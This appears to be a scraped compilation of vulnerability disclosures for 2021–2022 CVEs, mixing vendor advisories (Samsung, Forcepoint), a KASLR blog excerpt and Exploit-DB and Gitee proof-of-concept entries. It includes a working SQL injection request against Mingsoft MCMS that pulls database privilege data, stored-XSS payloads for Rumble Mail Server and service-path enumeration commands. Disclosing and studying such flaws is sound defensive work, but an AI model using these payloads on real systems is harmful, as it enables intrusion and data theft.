**Why is Attack Complexity marked as High for this vulnerability?**

Successful exploitation of this vulnerability requires an attacker to win a race condition.

CVE-2022-24482: Windows ALPC Elevation of Privilege Vulnerability

There is an unquoted service path in Sherpa Connector Service (SherpaConnectorService.exe) 2020.2.20328.2050. This might allow a local user to escalate privileges by creating a "C:\Program Files\Sherpa Software\Sherpa.exe" file.

    # Exploit Title:  Sherpa Connector Service (v2020.2.20328.2050) - Unquoted Service Path# Exploit Author: Manthan Chhabra (netsectuna), Harshit (fumenoid)# Version: 2020.2.20328.2050# Date: 02/04/2022# Vendor Homepage: http://gimmal.com/# Vulnerability Type: Unquoted Service Path# Tested on: Windows 10# CVE: CVE-2022-23909# Step to discover Unquoted Service Path:C:\>wmic service get name,displayname,pathname,startmode | findstr /i "sherpa" | findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """Sherpa Connector Service                                                            Sherpa Connector Service                                C:\Program Files\Sherpa Software\Sherpa Connector\SherpaConnectorService.exe                                            AutoC:\>sc qc "Sherpa Connector Service"[SC] QueryServiceConfig SUCCESSSERVICE_NAME: Sherpa Connector Service        TYPE               : 10  WIN32_OWN_PROCESS        START_TYPE         : 2   AUTO_START        ERROR_CONTROL      : 1   NORMAL        BINARY_PATH_NAME   : C:\Program Files\Sherpa Software\Sherpa Connector\SherpaConnectorService.exe        LOAD_ORDER_GROUP   :        TAG                : 0        DISPLAY_NAME       : Sherpa Connector Service        DEPENDENCIES       : wmiApSrv        SERVICE_START_NAME : LocalSystem

CVE-2022-23909: Sherpa Connector Service 2020.2.20328.2050 Unquoted Service Path ≈ Packet Storm

A DLL hijacking vulnerability in Samsung portable SSD T5 PC software before 1.6.9 could allow a local attacker to escalate privileges. (An attacker must already have user privileges on Windows 7, 10, or 11 to exploit this vulnerability.)

*   A DLL hijacking vulnerability could allow a local attacker to escalate privileges on affected system.  
    An attacker must already have user privilege on Windows 7, 10, 11 to exploit this vulnerability.
    
    CVE ID
    
    CVE-2022-25154
    
    Title
    
    DLL hijacking vulnerability
    
    Affected Product
    
    Samsung portable SSD T5 PC software
    
    Affected Version
    
    Below 1.6.9 version
    
    Severity
    
    7.8
    
    Reported Date
    
    09-Jan-2022
    
    Patched Version
    
    1.6.10
    

1.  Home
2.  _Product Security Updates_

CVE-2022-25154: Product Security Update | Support | Samsung Semiconductor Global

Mingsoft MCMS v5.2.7 was discovered to contain a SQL injection vulnerability via /cms/content/list.

**一、 cms简介**

Mingsoft MCMS是基于SpringBoot 2架构，前端基于vue、element ui。每月28定期更新版本，为开发者提供上百套免费模板,同时提供适用的插件（文章、商城、微信、论坛、会员、评论、支付、积分、工作流、任务调度等...），一套简单好用的开源系统、一整套优质的开源生态内容体系。铭飞的使命就是降低开发成本提高开发效率，提供全方位的企业级开发解决方案

**二、 漏洞简介**

Mingsoft MCMS v5.2.7版本存在SQL注入，该漏洞位于路由/cms/content/list，参数categoryId存在SQL注入，缺少对于SQL数据的过滤和转义

**三、 影响范围**

Mingsoft MCMS <=5.2.7  
![输入图片说明](https://images.gitee.com/uploads/images/2022/0303/002432_d85d9547_2159388.png "屏幕截图.png")

**四、 漏洞分析**

位于net/mingsoft/cms/action/ContentAction.java，找到有一处路由\*\*/cms/content/list\*\*代码如下，对第128行IContentBiz.query()进行分析  
![输入图片说明](https://images.gitee.com/uploads/images/2022/0303/002519_0609d5fb_2159388.png "屏幕截图.png")  
我们先看一下IContentBiz接口，IContentBiz接口继承了IBaseBiz接口，那么子类扩展父类之后就可以获得父类IBaseBiz的属性和方法  
![输入图片说明](https://images.gitee.com/uploads/images/2022/0303/002543_33cd0ce0_2159388.png "屏幕截图.png")  
接着，我们知道IBaseBiz是一个接口定义了query方法  
![输入图片说明](https://images.gitee.com/uploads/images/2022/0303/002609_d8960395_2159388.png "屏幕截图.png")  
BaseBizImpl实现类实现了IBaseBiz接口，我们知道一个类实现了一个或多个接口之后，这个类必须完全实现这些接口里所定义的全部抽象方法（也就是重写这些抽象方法），实现接口与继承父类相似，一样可以获得所实现接口里定义的常量和方法，可以看到IBaseBiz已经重写了query方法  
![](https://images.gitee.com/uploads/images/2022/0303/002636_f2aede33_2159388.png "屏幕截图.png")  
BaseBizImpl实现类中重写了父类的query方法  
![输入图片说明](https://images.gitee.com/uploads/images/2022/0303/002727_b1830bdf_2159388.png "屏幕截图.png")  
我们知道IContentDao.java,IContentDaoimpl.java和McmsAction.java，分别对应映射的对象，对象的实现类和前端控制器，位于net/mingsoft/cms/dao/IContentDao.java中，IContentDao接口继承了IBaseDao接口，那么IContentDao接口就获得了IBaseDao接口的所有方法  
![输入图片说明](https://images.gitee.com/uploads/images/2022/0303/002753_59f834ae_2159388.png "屏幕截图.png")  
从上图可以看到映射文件中的namespace="net.mingsoft.cms.dao.IContentDao"所绑定的是IContentDao接口，即面向接口编程，mybatis中，  
当你的namespace绑定接口后，可以不用写接口实现类，mybatis会通过该绑定自动帮你找到对应要执行的SQL语句，我们知道接口中的方法与映射文件中的SQL语句的ID一一对应，所以我们直接查找IContentDao.xml中SQL语句的id为query，下图可以看到成功定位到第212行。  
![输入图片说明](https://images.gitee.com/uploads/images/2022/0303/014728_66858f54_2159388.png "屏幕截图.png")  
分析id等于query的SQL语句，第221行  
`select id FROM cms_category where find_in_set('${categoryId}',CATEGORY_PARENT_IDS)>0`  
我们知道mybatis框架find\_in\_set后是不能用#{}，使用${}是拼接,底层调用的是Statement对象，直接将categoryId的属性值拼接进SQL语句，没有任何的过滤，参数categoryId存在SQL注入

**五、 证明**

不需要cookie凭证，直接构造poc即可利用：

    POST /cms/content/list HTTP/1.1
    Host:172.20.10.3:8081
    Connection: close
    Accept: application/json, text/plain, */*
    Origin: http://172.20.10.3:8081
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36
    Referer: http://172.20.10.3:8081/ms/main.do?
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 197
    
    categoryId=2' AND GTID_SUBSET(CONCAT(0x716a717871,(SELECT MID((IFNULL(CAST(grantee AS NCHAR),0x20)),1,190) FROM INFORMATION_SCHEMA.USER_PRIVILEGES LIMIT 78,1),0x716a627a71),3762) AND 'EIVI'='EIVI
    

本地搭建环境验证，在路由/cms/content/list下,参数categoryId存在SQL注入，如下图所示通过SQL注入成功获取到用户信息root@localhost  
![输入图片说明](https://images.gitee.com/uploads/images/2022/0303/021700_85cffd42_2159388.png "屏幕截图.png")

**六、 加固建议**

1、正确用法为使用foreach，对like、find\_in\_set、in和order语句需要使用#  
2、增加SQL filter过滤器，对危险参数进行严格校验及过滤。

CVE-2022-26585: Mingsoft MCMS v5.2.7 SQL注入 · Issue #I4W1S9 · 铭飞/MCMS - Gitee.com

Windows 10 made a lot of improvements in Kernel Address Space Layout Randomization (KASLR) that increases the cost of exploitation, particularly for remote code execution exploits. Many kernel virtual address space (VAS) locations including kernel stacks, pools, system PTEs etc. are randomized. A well-known exception to this is the KUSER_SHARED_DATA structure which is a page of memory that has always been traditionally mapped at a fixed virtual address in the kernel.

Randomizing the KUSER_SHARED_DATA Structure on Windows

Forcepoint One Endpoint prior to version 22.01 installed on Microsoft Windows does not provide sufficient anti-tampering protection of services by users with Administrator privileges. This could result in a user to disable Forcepoint One Endpoint and the protection offered by it.

![Forcepoint logo](https://help.forcepoint.com/security/CVE/ForcepointLogo.png)

**Security Advisory: CVE-2022-27609 - Incorrect Authorization******SUMMARY****

This advisory describes the Incorrect Authorization vulnerability (CVE-2022-27609) and its potential effect on Forcepoint products.

****INFORMATION****

**Published Date:** October 27, 2021

**Last Update:**March 28, 2022  
**Security Advisory Status:** Published  
**Security Advisory severity:** High  
**CVE Number(s):** CVE-2022-27609

**Security Advisory Summary**

The software performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check. This allows attackers to bypass intended access restrictions. 

Forcepoint One Endpoint prior to version 22.01 installed on Microsoft Windows does not provide sufficient anti-tampering protection of services by users with Administrator privileges. This could result in a user to disable Forcepoint One Endpoint and the protection offered by it.

**Affected products**

*   Forcepoint One Endpoint (Web Proxy Connect, Web Direct Connect, DLP, Combined Endpoints).

****RESOLUTION****

**Workarounds**

There are no workarounds at this time.

**Hotfix and information about other fixes**

The Endpoint version 22.01 includes the fix. See Release Notes for Forcepoint F1E v22.01 for more details on the latest Endpoint release.

**_Forcepoint would like to thank mr.d0x - @mrd0x for discovering and working with us to responsibly disclose this vulnerability._**

CVE-2022-27609

Forcepoint One Endpoint prior to version 22.01 installed on Microsoft Windows is vulnerable to registry key tampering by users with Administrator privileges. This could result in a user disabling anti-tampering mechanisms which would then allow the user to disable Forcepoint One Endpoint and the protection offered by it.

![Forcepoint logo](https://help.forcepoint.com/security/CVE/ForcepointLogo.png)

**Security Advisory: CVE-2022-27608 - Incorrect Authorization******SUMMARY****

This advisory describes the Incorrect Authorization vulnerability (CVE-2022-27608) and its potential effect on Forcepoint products.

****INFORMATION****

**Published Date:** October 27, 2021

**Last Update:**March 28, 2022  
**Security Advisory Status:** Published  
**Security Advisory severity:** High  
**CVE Number(s):** CVE-2022-27608

**Security Advisory Summary**

The software performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check. This allows attackers to bypass intended access restrictions. 

Forcepoint One Endpoint prior to version 22.01 installed on Microsoft Windows is vulnerable to registry key tampering by users with Administrator privileges. This could result in a user disabling anti-tampering mechanisms which would then allow the user to disable Forcepoint One Endpoint and the protection offered by it.

**Affected products**

*   Forcepoint One Endpoint (Web Proxy Connect, Web Direct Connect, DLP, Combined Endpoints).

****RESOLUTION****

**Workarounds**

There are no workarounds at this time.

**Hotfix and information about other fixes**

The Endpoint version 22.01 includes the fix. See Release Notes for Forcepoint F1E v22.01 for more details on the latest Endpoint release.

**_Forcepoint would like to thank mr.d0x - @mrd0x for discovering and working with us to responsibly disclose this vulnerability._**

CVE-2022-27608

A Cross Site Scripting (XSS) vulnerability exists in Rumble Mail Server 0.51.3135 via the username parameter.

    # Exploit Title: Rumble Mail Server 0.51.3135 - 'username' Stored XSS
    # Date: 2020-9-3
    # Exploit Author: Mohammed Alshehri
    # Vendor Homepage: http://rumble.sf.net/
    # Software Link:  https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe
    # Version: Version 0.51.3135
    # Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
    
    # Exploit:
    POST /users HTTP/1.1
    Host: 127.0.0.1:2580
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 96
    Origin: http://127.0.0.1:2580
    Authorization: Basic YWRtaW46YWRtaW4=
    Connection: keep-alive
    Referer: http://127.0.0.1:2580/users
    Upgrade-Insecure-Requests: 1
    
    username=%3Cscript%3Ealert%28%22M507%22%29%3C%2Fscript%3E&password=admin&rights=*&submit=Submit
    HTTP/1.1 200 OK
    Connection: close
    Content-Type: text/html
    
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <link rel="shortcut icon" href="/favicon.ico " />
    <title>RumbleLua</title>
    <link href="rumblelua2.css" rel="stylesheet" type="text/css" />
    </head>
    <body>
    <div class="header_top">
      <div class="header_stuff">
        RumbleLua on a.com<br />
        <span class="fineprint">Rumble Mail Server v/0.51.3135 <br />
        </span>
    
    <a href="/"><img src="/icons/computer.png" align="absmiddle" /> Server status</a>
    <a href="/domains"><img src="/icons/house.png" align="absmiddle" /> Domains & accounts</a>
    
    <a href="/users"><img src="/icons/group.png" align="absmiddle" /> RumbleLua users</a>
    <a href="/settings"><img src="/icons/report_edit.png" align="absmiddle" /> Server settings</a>
    <a href="/modules"><img src="/icons/plugin_edit.png" align="absmiddle" /> Set up modules</a>
    <a href="/systeminfo"><img src="/icons/page_white_find.png" align="absmiddle" /> System logs</a>
    <a href="/queue"><img src="/icons/clock.png" align="absmiddle" /> Mail queue</a>
    
    </div>
    </div>
    <div id="contents">
    
    
    <h1>RumbleLua users </h1>
    <p>This page allows you to create, modify or delete accounts on the RumbleLua system.<br />
    Users with <img src="../icons/action_lock.png" alt="lock" width="24" height="24" align="absmiddle" /><span style="color:#C33; font-weight:bold;"> Full control</span> can add, edit and delete domains as well as change server settings, <br />
    while regular users can only
    see and edit the domains they have access to.
    </p>
    <table class="elements">
      <tr>
        <th>Create a new user:</th>
      </tr>
    <tr>
    <td>
    <form action="/users" method="post" name="makeuser">
    
      <div style="width: 300px; text-align:right; float: left;">
        <label for="username"><strong>Username:</strong></label>
        <input name="username" autocomplete="off" type="text" id="username" >
        <br>
        <label for="password"><strong>Password:</strong></label>
        <input type="password" autocomplete="off" name="password" id="password">
        <br />
        <label for="password"><strong>Access rights:</strong></label>
        <select name="rights" size="4" style="width: 150px;" multiple="multiple">
        <option value="*" style="color:#C33; font-weight:bold;">Full control</option>
        <optgroup label="Domains:">
            </optgroup>
        </select>
          </div>
        <p><br /><br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    
          &nbsp;&nbsp;
          <input type="submit" name="submit" id="submit" value="Submit" />
        </p>
    
    </form>
    </td>
    </tr>
    </table>
    <table width="200" class="elements">
      <tr>
        <th>Username</th>
        <th>Rights</th>
        <th>Actions</th>
      </tr>
      <tr>
        <td><img src="/icons/action_lock.png" align="absmiddle"/>&nbsp;<strong><font color='#006600'><script>alert("M507")</script></font></strong></td>
        <td>Full control</td>
        <td>
    	<a href="/users?user=<script>alert("M507")</script>&edit=true"><img src="/icons/action_edit.png" title="Edit" align="absmiddle"/></a>&nbsp;
    	<a href="/users?user=<script>alert("M507")</script>&delete=true"><img src="/icons/action_delete.png" title="Delete" align="absmiddle"/></a>
    	</td>
      </tr>
        <tr>
        <td><img src="/icons/action_lock.png" align="absmiddle"/>&nbsp;<strong><font color='#006600'>admin</font></strong></td>
        <td>Full control</td>
        <td>
    	<a href="/users?user=admin&edit=true"><img src="/icons/action_edit.png" title="Edit" align="absmiddle"/></a>&nbsp;
    	<a href="/users?user=admin&delete=true"><img src="/icons/action_delete.png" title="Delete" align="absmiddle"/></a>
    	</td>
      </tr>
        <tr>
        <td><img src="/icons/action_lock.png" align="absmiddle"/>&nbsp;<strong><font color='#006600'><script>alert("M5072")</script></font></strong></td>
        <td>Full control</td>
        <td>
    	<a href="/users?user=<script>alert("XSS")</script>&edit=true"><img src="/icons/action_edit.png" title="Edit" align="absmiddle"/></a>&nbsp;
    	<a href="/users?user=<script>alert("XSS")</script>&delete=true"><img src="/icons/action_delete.png" title="Delete" align="absmiddle"/></a>
    	</td>
      </tr>
      </table>
    <p>&nbsp;</p>
    
    
    </div>
    <br />
    <p align="center">
    Powered by Rumble Mail Server - [<a href="https://sourceforge.net/p/rumble/wiki/Home/">wiki</a>] [<a href="https://sourceforge.net/projects/rumble/">project home</a>]
    </p>
    </body>
    
    
    </html>

CVE-2021-43462: Offensive Security’s Exploit Database Archive

A Cross Site Scripting (XSS) vulnerability exists in Rumble Mail Server 0.51.3135 via the (1) domain and (2) path parameters.

    # Exploit Title: Rumble Mail Server 0.51.3135 - 'domain and path' Stored XSS
    # Date: 2020-9-3
    # Exploit Author: Mohammed Alshehri
    # Vendor Homepage: http://rumble.sf.net/
    # Software Link:  https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe
    # Version: Version 0.51.3135
    # Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
    
    # Info
    The parameters `domain` and `path` are vulnerable to stored XSS.
    
    # Exploit:
    POST /domains HTTP/1.1
    Host: 127.0.0.1:2580
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 119
    Origin: http://127.0.0.1:2580
    Authorization: Basic YWRtaW46YWRtaW4=
    Connection: keep-alive
    Referer: http://127.0.0.1:2580/domains?domain=%3Cscript%3Ealert(
    Upgrade-Insecure-Requests: 1
    
    domain=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&path=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&create=true
    HTTP/1.1 200 OK
    Connection: close
    Content-Type: text/html
    
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <link rel="shortcut icon" href="/favicon.ico " />
    <title>RumbleLua</title>
    <link href="rumblelua2.css" rel="stylesheet" type="text/css" />
    </head>
    <body>
    <div class="header_top">
      <div class="header_stuff">
        RumbleLua on a<br />
        <span class="fineprint">Rumble Mail Server v/0.51.3135 <br />
        </span>
    
    <a href="/"><img src="/icons/computer.png" align="absmiddle" /> Server status</a>
    <a href="/domains"><img src="/icons/house.png" align="absmiddle" /> Domains & accounts</a>
    
    <a href="/users"><img src="/icons/group.png" align="absmiddle" /> RumbleLua users</a>
    <a href="/settings"><img src="/icons/report_edit.png" align="absmiddle" /> Server settings</a>
    <a href="/modules"><img src="/icons/plugin_edit.png" align="absmiddle" /> Set up modules</a>
    <a href="/systeminfo"><img src="/icons/page_white_find.png" align="absmiddle" /> System logs</a>
    <a href="/queue"><img src="/icons/clock.png" align="absmiddle" /> Mail queue</a>
    
    </div>
    </div>
    <div id="contents">
      <h2>Domains</h2>
    <p>
      <table class="elements" border='0' cellpadding='5' cellspacing='1'><tr><th>Create a new domain</th></tr><tr><td><b><font color='darkgreen'>Domain <script>alert("XSS")</script> has been created.</font></b></td></tr><tr><td>			<form action="/domains" method="post" id='create'>
    			<div>
    			<div >
    				<div class='form_key'>
    					Domain name:
    				</div>
    				<div class='form_value'>
    					<input type="text" name="domain"/>
    				</div>
    			</div>
    
    			<div>
    				<div class='form_key'>
    					Optional alt. storage path:
    				</div>
    				<div class='form_value'>
    					<input type="text" name="path"/>
    				</div>
    			</div>
    
    
    			<div class='form_el' id='domainsave' >
    				<div class='form_key'>
    						<input type="hidden" name="create" value="true"/>
    					<input class="button" type="submit" value="Save domain"/>
    					<input class="button"  type="reset" value="Reset"/>
    				</div>
    			</div>
    			<br/><br/><br/><br/><br />
    			</div>
    			</form>
    			</td></tr></table></p>
    <p>&nbsp;</p>
    <table class="elements" border='0' cellpadding='5' cellspacing='1'>
      <tr><th>Domain</th><th>Actions</th></tr>
    <tr><td><img src='/icons/house.png' align='absmiddle'/>&nbsp;<a href='/accounts:<script>alert("XSS")</script>'><strong><script>alert("XSS")</script></strong></a></td><td><a href="/domains:<script>alert("XSS")</script>"><img title='Edit domain' src='/icons/report_edit.png' align='absmiddle'/></a>  <a href="/domains?domain=<script>alert("XSS")</script>&delete=true"><img title='Delete domain' src='/icons/delete.png' align='absmiddle'/></a></td></tr></table>
    </div>
    <br />
    <p align="center">
    Powered by Rumble Mail Server - [<a href="https://sourceforge.net/p/rumble/wiki/Home/">wiki</a>] [<a href="https://sourceforge.net/projects/rumble/">project home</a>]
    </p>
    </body>
    
    
    </html>

Tag

#windows